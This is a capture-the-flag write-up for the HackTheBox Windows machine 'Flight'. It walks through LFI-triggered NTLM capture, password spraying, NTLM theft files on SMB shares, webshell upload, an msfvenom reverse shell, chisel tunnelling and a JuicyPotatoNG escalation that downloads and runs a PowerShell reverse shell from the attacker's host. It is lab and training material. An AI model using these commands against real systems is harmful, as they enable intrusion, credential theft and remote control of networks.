Flight — HackTheBox

https://app.hackthebox.com/machines/Flight

Flight is a hard windows machine from HackTheBox. The steps to root this box include exploiting local file inclusion (LFI), leaking NTLM hashes, forced authentication (SCF/URL file attacks) and using Juicy Potato NG to get system shell.

NMAP

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
|_http-title: g0 Aviation
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-11-07 02:18:08Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49692/tcp open  msrpc         Microsoft Windows RPC
57273/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: G0; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 6h59m55s
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-11-07T02:19:00
|_  start_date: N/A

PORT 445/139 (SMB)

We can’t list shares.

PORT 80 (HTTP)

While subdomain enumeration, school subdomain is found.

Add the subdomain school.flight.htb in the /etc/hosts file and open it in web browser.

When we open any page, it is passed by view parameter in the GET request.

This gives the idea to try for Local File Inclusion (LFI). We can try to access the index.php file to see if it’s accessible. Doing so, we get the content of index.php file.

LLMNR Poisoning

Looking at the code, it is blocking the path traversal sequence.

Since, it’s only blocking the backslashes, we can utilize the forward slashes to point it to access file on network share and capture it’s hash by performing LLMNR poisoning. So, first we need to start the responder.

sudo responder -I tun0

Then, point include the your IP address in the view parameter and responder will get a hit.

Cracking the hash we get password for svc_apache user.

Using the found credentials we can enumerate the users using LDAP.

crackmapexec smb -u svc_apache -p 'S@Ss!K@*t13' -d flight.htb --shares 10.10.11.187

Now that we have the list of users, we can spray the found password to see if anyone has this password reused. The S.Moon user has the same password.

crackmapexec smb -u ./users -p 'S@Ss!K@*t13' -d flight.htb 10.10.11.187

Forced Authentication (NTLM Theft)

Since we have the credentials, we can see the SMB shares. Using smbmap, we can see the permissions. The s.moon user has read write access on shared folder. Using this permission we can try to steal user hashes using scf or url file attacks.

So, when trying to upload SCF or URL file, it gives access denied. However we can upload empty files or create folder. This means that files are being blocked.

However, there are many other file/documents which can do the same thing of stealing hash which are mentioned in references. So, i found this tool which creates all files/documents for us in one go.

https://github.com/Greenwolf/ntlm_theft

So, started the responder to listen for hashes and uploaded all these files to try to see if some of them can work. Using this method, successfully got the hash for c.bum user.

# Start reponder
sudo responder -I tun0

# At smb share
prompt off
mput *

Cracking the hash using hashcat, we get the password for c.bum user.

Now again checking we have write access to Web share folder.

First thing, we can get the user flag from Users share.

Foothold

Now, that we have write access to Web share folder and we know that its using PHP so we can upload a PHP web shell. I will use the following.

GitHub - flozz/p0wny-shell: Single-file PHP shell

We can run commands as svc_apache.

Let’s get a proper reverse shell and switch to c.bum user as we have their credentials.

Create a stageless payload binary with msfvenom and upload it on the share same as we uploaded PHP web shell. And start the listener.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.44 LPORT=443 -f exe -o reverse.exe

rlwrap nc -lvnp 443

Executing the binary, we get shell as svc_apache.

Since we have the credentials, we can switch to other users.

For this, the tool that i’ll be using is mentioned in the following guide.

https://ppn.snovvcrash.rocks/pentest/infrastructure/ad/lateral-movement/runas#runascs

First, download the mentioned powershell script and upload it to target via SMB.

Then, on the reverse shell, start powershell and run script and invoke the function to run reverse.exe as c.bum user.

powershell -ep bypass
. .\Invoke-RunasCs.ps1
Invoke-RunasCs -Username c.bum -Password 'Tikkycoll_431012284' -Domain flight.htb -Command "C:\xampp\htdocs\school.flight.htb\reverse.exe"

Privilege Escalation

Checking for open ports, we can see that port 8000 is open, but we did not see it in our port scan.

Curling the url, we can see that it running another website that we have not seen earlier and it is running on MS IIS webserver. Previous ones were on apache.

Now that we have this information, we can forward this port to further analyze this application. For this i’ll be using chisel.

First download the windows version binary and upload it on target via smb. Then, download the linux version and start listening. Lastly run the following command to forward port 8000.

# On our machine
./chisel_linux server -p 1337 --reverse
# On target
.\chisel client 10.10.14.44:1337 R:8000:127.0.0.1:8000

Opening the website on port 8000, we can see that it’s another website. But, there’s nothing interesting because it’s a static page.

Checking the web-root of IIS, we can see that it is indeed a static site.

But, on checking the permissions on this directory, we can see that c.bum user has write permission in this directory.

Since we have write permissions, we can write an aspx webshell.

Using the binary that we created with msfvenom, we get a proper reverse shell on the system from this service account.

Juicy Potato

Looking at the privileges, we have SeImpersonate privilege enabled.

To abuse this, we can use JuicyPotatoNG to get a system shell.

certutil -urlcache -f http://10.10.14.44/JuicyPotatoNG.exe JuicyPotatoNG.exe

.\JuicyPotatoNG.exe -t * -p c:\windows\system32\cmd.exe -a "/c powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.14.44/Invoke-PowerShellTcp.ps1')"

Thanks.

References

• LLMNR Poisoning: https://notchxor.github.io/oscp-notes/4-win-privesc/17-llmnr/
• NTLM Theft: https://book.hacktricks.xyz/windows-hardening/ntlm/places-to-steal-ntlm-creds
• Lateral Movement: https://ppn.snovvcrash.rocks/pentest/infrastructure/ad/lateral-movement/runas
• Chisel Guide: https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html
• Abusing Tokens: https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens
• Juicy Potato: https://decoder.cloud/2022/09/21/giving-juicypotato-a-second-chance-juicypotatong/